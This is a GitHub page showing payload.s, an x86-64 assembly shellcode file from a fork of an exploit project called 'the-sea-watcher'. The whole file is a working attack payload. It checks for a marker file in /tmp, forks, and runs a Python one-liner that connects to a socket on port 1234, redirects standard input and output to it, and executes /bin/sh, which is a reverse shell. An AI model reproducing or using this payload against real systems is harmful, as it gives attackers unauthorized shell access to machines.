forked from scumjr/the-sea-watcher
/
payload.s
64 lines (55 loc) · 1.2 KB
/
payload.s
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
BITS 64
[SECTION .text]
global _start
_start:
;; access("/tmp/.x", R_OK)
push rdi
push rsi
mov rsi, 0x00782e2f706d742f
push rsi
mov rdi, rsp
mov rsi, 4
mov rax, 0x15
syscall
test rax, rax
pop rsi
pop rsi
pop rdi
je exit
;; fork
mov rax, 0x39
syscall
test rax, rax
jne exit
push rax
mov rdx, rsp ; arg3 [ NULL ]
mov rbx, 0x6e6f687479702fff
shr rbx, 0x8
push rbx
mov rbx, 0x6e69622f7273752f
push rbx
mov rdi, rsp ; arg1 "/usr/bin/python"
push rax ; NULL
call python
push rcx ; "-c..."
push rdi ; "/usr/bin/python"
mov rsi, rsp ; arg2 [ "/usr/bin/python", "-c...", NULL ]
;; exec
mov al, 0x3b
syscall
;; exit
mov al, 0x3c
syscall
exit:
;; execute missed instructions and return to callee
pop rax
push rbp
mov rbp, rsp
push r15
jmp rax
python:
;; mov rcx, rip+8
lea rcx, [rel $ +8]
ret
db '-cimport os,socket;open("/tmp/.x","w");s=socket.socket(2,1);s.connect(("127.000.000.001",1234));[os.dup2(s.fileno(),i) for i in range(3)];os.execvp("/bin/sh",["x"])'
db 0